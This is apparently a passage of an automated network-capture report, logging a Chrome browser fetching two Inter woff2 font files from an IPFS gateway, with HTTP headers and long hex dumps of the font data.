                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: f9 b3 4f 75 75 f7 f7 65 15 cb 9e 95 aa 6c c2 d0 02 61 17 32 0c 70 31 08 e8 e0 75 7b 8e 80 a8 df 88 fb 89 8d 1a 4b 72 a4 ef c8 6d c8 35 49 13 32 d6 bd dc b0 69 cb b6 1d bb 44 f6 ec e7 a0 06 40 8c 38 09 40 92 a4 14 18 80 10 8c a0 18 4e 90 14 cd b0 1c 2f 88 92 ac e9 06 b6 2c 80 08 73 bc 20 4a 83 bd 41 8e 5d c9 7c 56 ca 56 84 4a 6f ae d8 88 ef 3c 03 8a 92 6c cd 81 2c 4a 0e f0 de 9f f7 fb 4a c3 1a 32 fa a7 dd f6 46 1d 57 7e 9d 79 c6 aa 89 42 fb 3d 78 c1 61 95 02 30 bd 37 a9 07 c7 ee 2d 4b 1b c4 56 77 1e 94 d6 51 ad 52 e8 c4 f0 be 10 21 4c f5 78 50 55 07 41 81 cc d5 c7 60 ba f0 18 22 22 22 22 22 22 22 22 22 fa 5c 64 41 86 77 72 03 25 0f fa c1 c5 f7 ee c5 cc 3f 7f d2 19 66 66 66 66 66 be 7a b3 d3 9a 73 94 a3 ba ad 42 a5 2a 77 54 ab 09 ad a2 3c 25 1b b2 65 32 99
                                                                                                                                                                                                                                                  Data Ascii: Ouuela2p1u{Krm5I2iD@8@N/,s JA]|VVJo<l,JJ2FW~yB=xa07-KVwQR!LxPUA`"""""""""\dAwr%?fffffzsB*wT<%e2
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 05 10 61 8e 17 44 49 56 54 4d 37 4c cb 76 64 e6 04 21 18 41 31 9c 20 29 9a 61 39 5e 10 25 59 51 35 dd b0 10 2c 2a 80 08 13 ca 34 dd e0 a6 b0 6c 47 ba 9e 8d 05 80 10 8c a0 18 0e 4f 20 92 c8 14 36 87 cb e3 0b 84 22 b1 64 5c 36 50 69 5c 9e 38 5b fe 5c 58 40 fa c2 4d 40 31 9c 20 29 9a 61 39 5e 10 25 59 51 35 dd 30 2d db 71 3d 84 05 49 d1 0c 0b 20 c2 1c 2f 88 92 ac a8 9a 6e f8 f8 8e 05 02 04 11 26 94 69 ba c1 4d 61 d9 77 60 23 a2 fa bf 0b 01 45 33 2c 80 08 73 bc 20 4a b2 a2 6a ba 61 5a b6 e3 7a 3e 72 7f 77 38 41 08 46 50 0c 27 48 8a 66 58 6d 8b 08 92 a2 19 96 e3 05 37 2c 00 21 18 41 31 1c 9e 4c 67 68 b4 7a 83 d1 64 b6 58 6d 76 87 d3 e5 f6 78 7d 2c b6 5c 05 22 12 b2 4a 14 d4 06 f6 2a 8f db 57 7d 08 3b 8c 91 3e 4b 9d 9f f3 83 b2 7c 8d 4a f0 b1 ea 0e a8 e1 b3 5a
                                                                                                                                                                                                                                                  Data Ascii: aDIVTM7Lvd!A1 )a9^%YQ5,*4lGO 6"d\6Pi\8[\X@M@1 )a9^%YQ50-q=I /n&iMaw`#E3,s JjaZz>rw8AFP'HfXm7,!A1LghzdXmvx},\"J*W};>K|JZ
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: cb 76 dc bc 1f 78 e0 d2 0d 7d 0b 60 b3 3b 9c 20 04 23 28 86 13 24 45 33 2c c7 0b a2 24 2b aa a6 1b a6 85 68 51 01 44 98 50 a6 e9 06 37 85 65 3b d2 f5 7c 7f d7 ac b1 a1 36 0b cb 5e 61 4d a5 d1 19 4c 16 9b c3 e5 f1 05 42 91 58 22 95 c9 15 4a 15 1b 67 69 c0 d6 78 34 f5 3e 00 cc c7 0f 0e 28 01 bf ed e6 03 f6 94 85 3d ab 3a 7b ca 02 f9 b8 78 5a 7a 92 2f 96 11 ff c6 9a 75 1b 36 6d d9 b6 63 b7 45 a7 bd 57 bd 4f 0e 76 00 4c 8c 38 09 40 92 a4 b8 70 e5 26 93 57 ae dd d8 1c 4e 10 c5 70 82 a4 68 86 e5 78 41 94 64 45 d5 74 c3 b4 54 c9 a9 fb fd 22 00 00 a0 61 eb 5b 30 ad 75 b1 ea 3c 18 93 1f e8 35 91 45 56 85 11 c5 ff 5f aa 0c f5 a1 83 d6 e8 27 01 7c 6e 7a c2 0f 6d 54 e8 b8 52 3e 72 04 51 92 15 55 d3 0d d3 c2 66 51 01 44 98 50 a6 e9 88 ca 14 2a 8d c5 e6 70 79 7c 81 50
                                                                                                                                                                                                                                                  Data Ascii: vx}`; #($E3,$+hQDP7e;|6^aMLBX"Jgix4>(=:{xZz/u6mcEWOvL8@p&WNphxAdEtT"a[0u<5EV_'|nzmTR>rQUfQDP*py|P


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  7192.168.2.549717209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC867OUTGET /_next/static/media/Inter-SemiBold.fcb100c7.woff2 HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/css/0da2d62e1a58e826.css
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1364INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:39 GMT
                                                                                                                                                                                                                                                  Content-Type: font/woff2
                                                                                                                                                                                                                                                  Content-Length: 105804
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreiavejqsshetrks2vvvfnvjli774xcj5dqbypz3np4tqu44c754g2u"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/media/Inter-SemiBold.fcb100c7.woff2
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeifof6k75qeadmbrmujchwmdll7rtygnwlov6xsnie6lclbmeab4zq,bafkreiavejqsshetrks2vvvfnvjli774xcj5dqbypz3np4tqu44c754g2u
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-03
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 73292
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 30 32 39 62 64 63 34 33 61 64 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Server: cloudflareCF-RAY: 8ca0e4029bdc43ad-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 77 4f 46 32 00 01 00 00 00 01 9d 4c 00 0d 00 00 00 04 bd 40 00 01 9c ef 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 88 0c 1b 84 dc 40 1c 81 aa 4a 06 60 00 81 cb 0a 0a 88 a6 6c 86 e4 1f 0b cf 54 00 01 36 02 24 03 cf 4e 04 20 05 8d 24 07 81 c9 2d 5b 37 33 b4 de 4f f1 b7 f7 ba b2 de 71 96 16 ad 8a 38 56 67 02 41 d0 80 c8 fc c7 e8 5f 23 be 99 7a 00 36 d5 ee bf 9b a7 11 95 8c b9 87 f9 00 21 32 82 b4 ea 18 c3 03 1b 0e a5 32 7b d5 11 54 af fd 7e 90 d0 9b d5 c7 89 1f d9 f4 d9 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff df d7 f2 23 fc cd de 4c 92 ce ec 6e 12 92 90 10 40 c2 47 08 88 88 a2 80 15 7f b5 ad b5 9f ab ad ad 6d ef ae bd 83 28 84 18 21 16 4e 35 8c 10 33 aa 0d 4e 95 18 aa ca 25 a9 b2 59 c6 24 11 9a 69 2e 28 d0 d2 56 d9 6e 10
                                                                                                                                                                                                                                                  Data Ascii: wOF2L@@J`lT6$N $-[73Oq8VgA_#z6!22{T~#Ln@Gm(!N53N%Y$i.(Vn
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 21 34 b4 48 87 db 75 0f 60 9d 27 36 95 33 cc f4 30 4c f4 6c 53 93 3d 3d 91 f1 fc f3 af 5e f7 bf a8 1c 0b 59 13 b3 68 2b 63 39 80 a7 b5 db 4b e6 8e 05 03 aa 51 65 aa 68 60 ab 9d eb 7c 78 2f 30 18 0b 94 b6 87 df 6c 77 1e d7 5a 49 48 30 1e e1 30 c2 fd 00 f8 df 35 bd 57 d9 0e ec 64 9e 2f 82 1a 70 81 f5 72 c9 bf bb bf 05 b0 24 5d bd 1e aa 4a e4 0f a5 9c 1b 4f cf 5f 3c ec cc bd 6f de ee 42 e0 81 64 14 5b ce 91 d6 47 75 ac 57 56 1f 96 a1 35 dc a0 e1 51 6b f4 06 a1 42 9d 29 d0 66 7a 22 f2 06 1d ff f9 71 7d 33 17 e7 9c fb 66 fe 86 ba 0d 8e db e0 26 36 a8 52 5d f1 b7 45 02 91 c0 b6 a5 11 7e ff 73 4f 66 01 f8 27 73 ef cc 3c 4a fe 12 a3 02 2a b2 44 50 04 aa b5 75 ac 2a 74 4f d5 b6 12 91 c2 6d 7f 31 2e f6 81 18 c4 81 fb 3d 46 4b c0 01 4e ec 55 d7 8f 5e 05 d0 70 22 25
                                                                                                                                                                                                                                                  Data Ascii: !4Hu`'630LlS==^Yh+c9KQeh`|x/0lwZIH005Wd/pr$]JO_<oBd[GuWV5QkB)fz"q}3f&6R]E~sOf's<J*DPu*tOm1.=FKNU^p"%
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: e6 8e 9d 23 3b 0b 54 54 54 1d 62 d1 70 ff e7 8f 1c cd 48 06 81 9d 95 64 27 37 51 48 d6 92 64 27 59 c9 0e 39 72 7c 89 1d 74 c8 10 7b 01 69 24 e7 9c 91 e9 49 8a f3 80 9e 4c 01 c2 25 74 72 44 50 97 cb 58 6d d7 5c 5b 6e 79 0c 3d fa ff 6f a6 65 fa 2f 8a bd fc 05 82 12 9a 5c 03 ce ca 74 c9 36 86 b3 06 b2 e9 1a eb 22 05 71 fd f7 bb 51 f5 ea a3 80 2e 74 43 c3 ea a2 81 a1 6b 90 87 07 0d 8c 61 37 77 25 34 0c a7 81 f1 98 35 de 47 68 70 0c 31 1e 18 c7 59 39 6b c2 0d 52 99 58 47 41 64 6d 2a 45 3a 4a 95 64 c6 a7 52 a4 20 56 92 4b 49 a6 2c 10 41 b4 ac d9 2e 77 8d 43 38 5a ae 3c e1 48 56 cc 2f b1 ff 9e ac 42 76 0b 59 86 90 74 54 1e 21 81 a8 96 26 bd 7e 79 15 98 05 d9 79 3f 64 08 6e a7 4e eb fd 9c a8 4b ec 03 20 5a dd 29 fd 67 ec 48 a8 a1 09 36 63 99 d2 fb 90 a1 9d 79 be
                                                                                                                                                                                                                                                  Data Ascii: #;TTTbpHd'7QHd'Y9r|t{i$IL%trDPXm\[ny=oe/\t6"qQ.tCka7w%45Ghp1Y9kRXGAdm*E:JdR VKI,A.wC8Z<HV/BvYtT!&~yy?dnNK Z)gH6cy
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 36 00 c2 fb 0d ca d1 38 ed 4c 9c 71 2e ce b9 18 17 6f fa c5 35 18 fb 33 bb 04 44 50 dd 8a db ea ce 8c 5c 88 a2 90 a4 c8 4e 59 66 d3 89 eb 74 15 32 6f 0b 9b 61 22 66 84 c8 19 e3 e1 7c e8 d1 7c e4 f1 4c 92 32 53 14 cc 02 85 b3 c8 b3 59 aa 7c 96 63 cd 1a 75 b3 4e d3 ec 8a 2e fa 04 4c 0d 00 51 83 40 d5 14 30 35 0b 4c cd b9 eb 9c 9f 0b 20 ea 6f 5b 8e 0d 70 7b 03 21 13 00 8c cc 09 20 64 6e 00 21 f3 03 82 2c 08 08 b2 90 0f 62 ac 88 b6 ae 94 64 56 46 8a ab 94 54 57 5d d2 5a 2d ed dc 9d 32 5d 35 ed 59 cd 38 20 40 90 0f d7 a0 25 3b ae ed 1d 2e d8 c9 75 1d 96 4e af 5b 3a bb de d6 e5 0d 8a 6b 06 5a b2 3f 20 c8 01 96 42 16 a1 5b 8b 54 ec 56 a5 ec c5 4b 4f b7 59 15 db 17 d5 02 84 5c 07 08 b9 1e 30 72 a3 a5 96 2d a9 77 f1 98 02 10 f2 b4 69 5e 39 09 68 29 1a a7 05 82 a2
                                                                                                                                                                                                                                                  Data Ascii: 68Lq.o53DP\NYft2oa"f||L2SY|cuN.LQ@05L o[p{! dn!,bdVFTW]Z-2]5Y8 @%;.uN[:kZ? B[TVKOY\0r-wi^9h)
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: a8 46 57 e4 ab 54 8f 1c 27 c1 c9 64 5f 4d df 4b 5b d0 bc a8 f7 d2 ce 50 f9 07 6b 8b 62 a5 28 76 cd 9a 5d 88 93 b1 98 d2 f9 e9 a5 2f 3c 9c 3e f9 08 de 13 9d b2 d3 0e af dc 71 bf 3f ba ba 7b ee da 45 27 ee 60 d5 d8 79 a2 46 be fe a2 b3 8d ae 66 74 26 ba 85 1e d4 b5 9b 14 07 eb 42 8e 1c 7d 3a f5 8f 6e 8f fc 71 e7 eb a3 36 95 64 6a ae 9e d0 ce 71 df 4a ba a7 0e fa 45 ee 34 72 1f c9 9c 0f 68 7b a8 22 a6 dd 93 de cb ff 65 28 cd a9 a2 f0 00 0a c6 20 d6 a9 b5 4b 93 4e 51 ba 75 7b a5 d7 30 96 51 d3 9a 7c f4 59 a7 2f be e8 b9 15 90 20 1e 9c d7 2a 62 72 62 06 46 60 76 48 03 51 57 8c 11 e8 49 cd 28 d1 3b 4a 09 63 da a0 ea 0d e7 82 fc 6d 0d 13 75 ff 71 d0 34 94 98 c9 6a a1 46 73 9d d8 27 70 bd e1 23 14 9d 54 8d 18 5c d6 41 5d 9f c7 0e 98 37 ce c5 a1 69 5e 78 82 ff 40
                                                                                                                                                                                                                                                  Data Ascii: FWT'd_MK[Pkb(v]/<>q?{E'`yFft&B}:nq6djqJE4rh{"e( KNQu{0Q|Y/ *brbF`vHQWI(;Jcmuq4jFs'p#T\A]7i^x@
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: f8 5c ac f0 2a 0f fd b1 7f 60 a1 cd 67 58 5e 10 15 35 6d 4f 9e 3a 66 4f 32 b3 02 75 62 d1 20 d7 49 9e c9 de 4b e3 59 f0 39 8f 5e 0f cf ac 02 d3 37 33 fd 12 38 cc a5 21 df 91 09 46 ed 29 6c c9 a6 59 5f 62 d1 ff 45 37 27 63 a7 f0 ed c5 77 c8 a0 50 77 85 09 17 e1 9e 48 51 a2 dd 17 e3 81 58 0f c5 79 24 5e 82 44 8f 25 49 96 22 15 d3 13 69 d2 65 c8 94 55 05 d8 cb 3c 57 ee c5 7a 25 f5 6e 9b bd 47 af 37 fa bc d5 6f c0 a0 77 86 44 62 b8 5b d4 e0 a8 45 bf 18 18 4b 3a af bf 21 2f 6a c5 c6 a8 3f d0 3a 65 84 e0 06 6e e2 16 c5 8b ef 4f 57 a2 e1 88 ad 15 08 35 5d b4 de 17 46 47 23 4c bf 0b d6 74 77 27 9e 87 ee 8b 5e a0 d4 f5 2c f7 c6 f4 d5 28 3a 14 14 c8 e1 c0 dd 38 65 05 f6 2c 23 71 39 b0 0f 34 fb 3e 1d 65 a4 3f 39 1b 2b b1 16 ef 77 ad a1 c3 ae f4 51 7b 03 00 00 00 00
                                                                                                                                                                                                                                                  Data Ascii: \*`gX^5mO:fO2ub IKY9^738!F)lY_bE7'cwPwHQXy$^D%I"ieU<Wz%nG7owDb[EK:!/j?:enOW5]FG#Ltw'^,(:8e,#q94>e?9+wQ{
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: c3 ea 8c 03 53 77 08 0a 32 af 22 3d 3e 74 5f 0f 54 ae a9 c4 67 bb 4b 01 e2 7b 8c 68 37 98 d4 e8 e0 bd 61 1a 69 93 52 d6 64 0d 19 c2 3e 67 cc 76 77 92 0d 2c 11 09 e8 f0 1e 14 e0 c3 f9 64 e9 7f 23 b2 fb 8e fe d2 7e fc fa 03 40 08 46 50 0c 27 48 8a 66 58 8e 17 44 49 a5 d6 68 75 7a 83 d1 64 b6 58 6d b2 62 77 38 5d 6e 8f 17 47 40 62 5c 48 65 69 91 f1 e2 d5 9b 77 1f 3e 7d d5 e0 db 68 32 5b 00 10 e2 78 41 94 64 45 d5 74 ab cd ee 70 52 d8 b0 1c 2f 88 92 ac a8 1a 80 08 13 aa 1b a6 65 3b 66 bc 55 7b f6 1d 38 74 e4 97 3f 20 04 23 28 86 13 24 45 33 2c c7 0b a2 24 2b aa a6 1b 8c 26 b3 c5 ad ea b4 6c c7 f5 78 7d fe 17 58 1d 00 00 00 00 00 00 00 00 00 00 00 00 06 2e 45 32 64 c9 b9 4d de 1d 77 dd a3 40 51 a8 30 e1 22 44 8a 12 2d 56 1c 84 78 09 90 50 12 25 41 c3 48 96 12
                                                                                                                                                                                                                                                  Data Ascii: Sw2"=>t_TgK{h7aiRd>gvw,d#~@FP'HfXDIhuzdXmbw8]nG@b\Heiw>}h2[xAdEtpR/e;fU{8t? #($E3,$+&lx}X.E2dMw@Q0"D-VxP%AH
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: dc cb 36 9d 69 01 30 b3 31 bd 54 86 18 ca 30 0c d3 ac b9 5a 62 18 86 61 60 87 0c a2 e8 d2 aa 8c f6 19 f4 2f 21 d3 5b f7 1b 4c 4c c4 fa f1 e2 de 11 63 e3 36 44 c9 3b f7 45 a3 88 ad 64 3d a8 59 e5 3f 69 5c 2f d3 37 72 67 55 f9 6f 89 87 9d 59 7f cb 42 e5 1c 85 4e da 90 21 a2 84 08 13 aa 1b a6 65 3b 00 fb 0b 10 28 68 3b f8 f4 73 7d c6 a6 e8 67 84 bb f8 86 b2 76 3a d3 3c 6c 06 61 ae 14 71 0e 02 84 60 04 c5 70 82 a4 68 e6 e6 5f 14 aa 83 ec bd be 94 ea be 5f fd 60 00 84 60 04 c5 70 82 a4 68 86 e5 78 41 94 64 85 2b 6a 37 63 27 af 90 a2 0d bd ff 8e 47 27 cc b9 f5 f9 0b 4c bc 75 9c e2 99 63 f6 23 42 ab d2 13 f2 62 38 7f 32 df a5 ac f6 d7 b2 7f 56 ac 5a b3 6e 23 36 f3 02 04 0a 83 23 20 5a c2 92 c2 b4 06 18 96 e3 b5 82 28 c9 8a 4e d5 1b 4c 66 0b c6 c9 53 a0 48 89 32
                                                                                                                                                                                                                                                  Data Ascii: 6i01T0Zba`/![LLc6D;Ed=Y?i\/7rgUoYBN!e;(h;s}gv:<laq`ph__``phxAd+j7c'G'Luc#Bb82VZn#6# Z(NLfSH2
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 74 a2 4b 74 4f f0 69 1d fc 7f 8e 42 06 63 9a c6 c8 d3 94 67 f9 62 c2 cb f8 a8 3b 14 6f e4 c8 91 9b 5c 08 ed fc 5d a7 b4 5c bd ba 77 de 41 28 f9 64 2d 74 63 2c 86 88 06 53 73 ec 1b 9b 82 4d 6f 19 43 d7 3d d4 87 82 44 05 07 38 c1 e5 34 57 9a 16 b4 a2 0d ed 60 a3 03 9d e8 12 dd 5a 6b f5 d7 2c 8f 8c ec 91 86 de cf 55 43 6c a5 ef 23 23 59 a4 3c 1f 9d d4 d8 14 4e b3 c9 6a 41 ab d3 66 94 da c1 46 07 3a d1 25 ba 73 f7 55 38 d9 d8 73 03 ca 53 e1 a5 4a af b0 54 a9 56 a3 d6 6b 75 ea 35 68 d4 a4 59 8b 56 6d ba e8 cc b4 ed 6f e1 64 dd 8f 65 6a 28 0b 97 b9 22 30 1f 2e a3 e7 fa 23 26 a7 a7 95 79 56 a7 51 09 af c0 47 8a cb 50 05 82 73 9d 98 4d 0a 94 67 d2 0f ab 86 3d 78 f0 b0 13 6b f2 f0 08 c9 22 25 6b 7c 8f c7 e9 61 a2 c8 bb 18 d5 9d a0 2d e2 9d 3a 99 55 15 a4 fe 7b 53
                                                                                                                                                                                                                                                  Data Ascii: tKtOiBcgb;o\]\wA(d-tc,SsMoC=D84W`Zk,UCl##Y<NjAfF:%sU8sSJTVku5hYVmodej("0.#&yVQGPsMg=xk"%k|a-:U{S


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  8192.168.2.549718209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC865OUTGET /_next/static/media/Inter-Medium.dc792b50.woff2 HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  Origin: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: font
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/css/0da2d62e1a58e826.css
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1362INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:39 GMT
                                                                                                                                                                                                                                                  Content-Type: font/woff2
                                                                                                                                                                                                                                                  Content-Length: 105924
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreia3jgfzlhs3pxwl7emfqa2zdus3yh57qptzqnzo2mgtfvohtwbp6y"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/media/Inter-Medium.dc792b50.woff2
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeifof6k75qeadmbrmujchwmdll7rtygnwlov6xsnie6lclbmeab4zq,bafkreia3jgfzlhs3pxwl7emfqa2zdus3yh57qptzqnzo2mgtfvohtwbp6y
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-03
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 73292
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC52INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 30 34 35 39 34 36 37 63 66 61 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Server: cloudflareCF-RAY: 8ca0e40459467cfa-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 77 4f 46 32 00 01 00 00 00 01 9d c4 00 0d 00 00 00 04 bb a4 00 01 9d 65 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 88 0c 1b 84 da 72 1c 81 aa 4a 06 60 00 81 cb 0a 0a 88 a5 30 86 e8 1f 0b cf 54 00 01 36 02 24 03 cf 4e 04 20 05 8d 10 07 81 c9 2d 5b 55 34 b4 18 2a c5 dc ce 39 2d c6 49 cf d8 4a 88 2a 68 12 aa 0f ca a7 4f 20 b0 6b 44 33 3d 2c 28 5d dd bd 65 1a 51 c9 98 7b f8 f8 49 70 b0 d8 d2 51 c7 e1 ab 2d 45 7e 78 d6 19 86 5e e1 8c 03 bd 59 cf c5 11 cc d3 67 ff ff ff ff ff ff ff ff ff ff ff ff ff ff 37 b2 fc 08 db fc 37 b3 c9 9f d9 dd 1c 24 90 10 84 3b 80 1c 0a 82 27 48 ab c5 1e 56 7f 85 30 aa 6a 9d 17 a8 46 31 92 b4 41 9c cb 48 de 84 73 4c 0b aa 96 2b d4 e6 25 d3 6a a3 22 49 db a1 d3 d1 8b 6e c3 f9 0b 0b db eb 63 30 f4 a3 31
                                                                                                                                                                                                                                                  Data Ascii: wOF2erJ`0T6$N -[U4*9-IJ*hO kD3=,(]eQ{IpQ-E~x^Yg77$;'HV0jF1AHsL+%j"Inc01
